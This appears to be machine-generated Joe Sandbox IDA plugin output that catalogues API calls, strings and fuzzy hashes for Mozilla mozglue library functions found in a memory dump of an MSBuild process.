                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemoz_xmalloc$HandleModule$malloc
                                                                                                                                                                                                                      • String ID: ntdll.dll
                                                                                                                                                                                                                      • API String ID: 301460908-2227199552
                                                                                                                                                                                                                      • Opcode ID: 2003680df4a19c655f5bb94941963ba30b2a4a908cbf9cbc8b428950cf7259c9
                                                                                                                                                                                                                      • Instruction ID: aea0c58faf8c4345ddb3a49d4e1dc729a520da53e1af9607ec9acbba64d17a56
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2003680df4a19c655f5bb94941963ba30b2a4a908cbf9cbc8b428950cf7259c9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E94136B9B047048BDB248F68DA4079EB7B0FF59758F20483DD81AA7B81EB31A549C784
                                                                                                                                                                                                                      Function 6C899620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C899675
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C899697
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C8996E8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C899707
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C89971F
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C899773
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C8997B7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C8997D0
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C8997EB
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C899824
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                                                                                                                                      • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 409848716-3880535382
                                                                                                                                                                                                                      • Opcode ID: 15f4eab077848a6e3d143faca9aa7ab751a5a53310f067c8608d5198abf32d80
                                                                                                                                                                                                                      • Instruction ID: 72bbbf6e3e2f48db51531bbcc69f85b65a8c0528017b51d1d63f218e930a768f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15f4eab077848a6e3d143faca9aa7ab751a5a53310f067c8608d5198abf32d80
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB41A275704205AFDF10CFACD984A9A77B8FB8A759F20492CED1997740D730E914CBA2
                                                                                                                                                                                                                      Function 6C881E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784), ref: 6C881EC1
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C881EE1
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E744), ref: 6C881F38
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E744), ref: 6C881F5C
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C881F83
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C881FC0
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784), ref: 6C881FE2
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C881FF6
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C882019
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                                                                                                                                                      • String ID: MOZ_CRASH()
                                                                                                                                                                                                                      • API String ID: 2055633661-2608361144
                                                                                                                                                                                                                      • Opcode ID: 465e4a12169e50369b383f93400644e93c7bd62264f6e35ce71b96ec234c2109
                                                                                                                                                                                                                      • Instruction ID: 6c80d5363eee721ae9158e9b0afd22a93f2dc8da55994ecac23024b831285b44
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 465e4a12169e50369b383f93400644e93c7bd62264f6e35ce71b96ec234c2109
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B541D371B063198FDB109F68C988B6F76B5EF49749F10043DE96597B41DB70D8048BD1
                                                                                                                                                                                                                      Function 6C8E5FF0 Relevance: 15.1, APIs: 10, Instructions: 76COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 6C8E6009
                                                                                                                                                                                                                      • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C8E6024
                                                                                                                                                                                                                      • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6C88EE51,?), ref: 6C8E6046
                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(?,6C88EE51,?), ref: 6C8E6061
                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C8E6069
                                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C8E6073
                                                                                                                                                                                                                      • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C8E6082
                                                                                                                                                                                                                      • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C90148E), ref: 6C8E6091
                                                                                                                                                                                                                      • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6C88EE51,00000000,?), ref: 6C8E60BA
                                                                                                                                                                                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C8E60C4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3835517998-0
                                                                                                                                                                                                                      • Opcode ID: 6784d730f34e9bb5e73de8623dd681363aa8a80a72e784579a51dd547f6895bb
                                                                                                                                                                                                                      • Instruction ID: afebd566703be5228e8d9b814d9a3652f013cd8f9af56c83524eddfe7c91d65e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6784d730f34e9bb5e73de8623dd681363aa8a80a72e784579a51dd547f6895bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F21E571B002189FDF206F28DC08AAE7BB8FF45218F10882CE95AA7241DB74A559CFD1
                                                                                                                                                                                                                      Function 6C8D0000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D0039
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8D0041
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D0075
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8D0082
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000048), ref: 6C8D0090
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8D0104
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8D011B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C8D005B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                                                                                                                                                                      • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                                                                                                                                                                      • API String ID: 3012294017-637075127
                                                                                                                                                                                                                      • Opcode ID: 12d74b0c6fdbbc95d66fc5a4433977b013eb4f4470331545c373a36ff0b69d9e
                                                                                                                                                                                                                      • Instruction ID: 34291cbed5b13b37098aa411ed194a1cd6dd305eeb3dbfbbeb5872425eee0e0c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12d74b0c6fdbbc95d66fc5a4433977b013eb4f4470331545c373a36ff0b69d9e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C419AB1604644AFCB20CF68C944A9ABBF1FF49318F60492DED5A93B40D731F915CB95
                                                                                                                                                                                                                      Function 6C897E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C897EA7
                                                                                                                                                                                                                      • malloc.MOZGLUE(00000001), ref: 6C897EB3
                                                                                                                                                                                                                        • Part of subcall function 6C89CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C89CB49
                                                                                                                                                                                                                        • Part of subcall function 6C89CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C89CBB6
                                                                                                                                                                                                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C897EC4
                                                                                                                                                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6C897F19
                                                                                                                                                                                                                      • malloc.MOZGLUE(?), ref: 6C897F36
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C897F4D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                                      • API String ID: 204725295-2564639436
                                                                                                                                                                                                                      • Opcode ID: 7fad3b5f1eec3d11c8f32e05685c6e8fee9db6aa5a7a11fc06b4accc3573d832
                                                                                                                                                                                                                      • Instruction ID: 04b53dc6fa46d88fd91f0b4f294997d6a5642a666963ee47338123ff209fbd05
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fad3b5f1eec3d11c8f32e05685c6e8fee9db6aa5a7a11fc06b4accc3573d832
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E310761E0424897DB109F6CDD449FEB778EF96248F04963DED59A7612FB30A988C390
                                                                                                                                                                                                                      Function 6C893E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,6C893CCC), ref: 6C893EEE
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C893FDC
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,00000040,?,?,?,?,?,6C893CCC), ref: 6C894006
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C8940A1
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C893CCC), ref: 6C8940AF
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C893CCC), ref: 6C8940C2
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C894134
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C893CCC), ref: 6C894143
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C893CCC), ref: 6C894157
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Free$Heap$StringUnicode$Allocate
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3680524765-0
                                                                                                                                                                                                                      • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                                                                                      • Instruction ID: 8a7e7d102a4a54a66deb846e87666cea413cf290325bcdb5d6c4849c275e52a6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67A180B1A00205CFDB60CF6CC980659B7B5FF88308F2549A9D919AF752D771ED86CBA0
                                                                                                                                                                                                                      Function 6C882030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,6C8A3F47,?,?,?,6C8A3F47,6C8A1A70,?), ref: 6C88207F
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000E5,6C8A3F47,?,6C8A3F47,6C8A1A70,?), ref: 6C8820DD
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C8A3F47,6C8A1A70,?), ref: 6C88211A
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E744,?,6C8A3F47,6C8A1A70,?), ref: 6C882145
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C8A3F47,6C8A1A70,?), ref: 6C8821BA
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E744,?,6C8A3F47,6C8A1A70,?), ref: 6C8821E0
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E744,?,6C8A3F47,6C8A1A70,?), ref: 6C882232
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                                                                                                                                                                      • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                                                                                                                                                                      • API String ID: 889484744-884734703
                                                                                                                                                                                                                      • Opcode ID: fc081457ba0caadba6a6e836e20afdfe3e02f9790ad0e43dd90bf94f65651485
                                                                                                                                                                                                                      • Instruction ID: 813c4135e7d06b9890090747f3842ee16528423485aac6394bcc324ae76a86d1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc081457ba0caadba6a6e836e20afdfe3e02f9790ad0e43dd90bf94f65651485
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53610631F052168FCB24CE68CA88B6EB3B1AF85318F254A7DE525A7F84D7749C00C781
                                                                                                                                                                                                                      Function 6C8848E0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(8E8DFFFF,?,6C8C483A,?), ref: 6C884ACB
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6C8C483A,?), ref: 6C884AE0
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(FFFE15BF,?,6C8C483A,?), ref: 6C884A82
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: mozalloc_abort.MOZGLUE(?), ref: 6C89CAA2
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6C8C483A,?), ref: 6C884A97
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(15D4E801,?,6C8C483A,?), ref: 6C884A35
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6C8C483A,?), ref: 6C884A4A
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(15D4E824,?,6C8C483A,?), ref: 6C884AF4
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(FFFE15E2,?,6C8C483A,?), ref: 6C884B10
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(8E8E0022,?,6C8C483A,?), ref: 6C884B2C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4251373892-0
                                                                                                                                                                                                                      • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                                                                                                                                                      • Instruction ID: 85dc02059fff959818b608c6157b9a84c7a7eba6f28a8cc8e177553f3710959b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93715DB19017069FC724CF68C5905AAB7F9FF88308B504A3ED15A9BB51E731F655CB80
                                                                                                                                                                                                                      Function 6C8D9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8D8273), ref: 6C8D9D65
                                                                                                                                                                                                                      • free.MOZGLUE(6C8D8273,?), ref: 6C8D9D7C
                                                                                                                                                                                                                      • free.MOZGLUE(?,?), ref: 6C8D9D92
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C8D9E0F
                                                                                                                                                                                                                      • free.MOZGLUE(6C8D946B,?,?), ref: 6C8D9E24
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?), ref: 6C8D9E3A
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C8D9EC8
                                                                                                                                                                                                                      • free.MOZGLUE(6C8D946B,?,?,?), ref: 6C8D9EDF
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?), ref: 6C8D9EF5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 956590011-0
                                                                                                                                                                                                                      • Opcode ID: 7ed78bb7a8c3b257c3c15df171baec3993e8e158f811a0a7f90b9a13c8347159
                                                                                                                                                                                                                      • Instruction ID: 3d64dc803a444578b0cbeb6f38e1f684ee1cf2c94c0efff65355ac815b1ea38f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ed78bb7a8c3b257c3c15df171baec3993e8e158f811a0a7f90b9a13c8347159
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76719E70909B419BC722CF58C69055AF3F4FF99325B459A19E84A9B701EB30F8C5CB81
                                                                                                                                                                                                                      Function 6C8DDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C8DDDCF
                                                                                                                                                                                                                        • Part of subcall function 6C8BFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8BFA4B
                                                                                                                                                                                                                        • Part of subcall function 6C8D90E0: free.MOZGLUE(?,00000000,?,?,6C8DDEDB), ref: 6C8D90FF
                                                                                                                                                                                                                        • Part of subcall function 6C8D90E0: free.MOZGLUE(?,00000000,?,?,6C8DDEDB), ref: 6C8D9108
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8DDE0D
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8DDE41
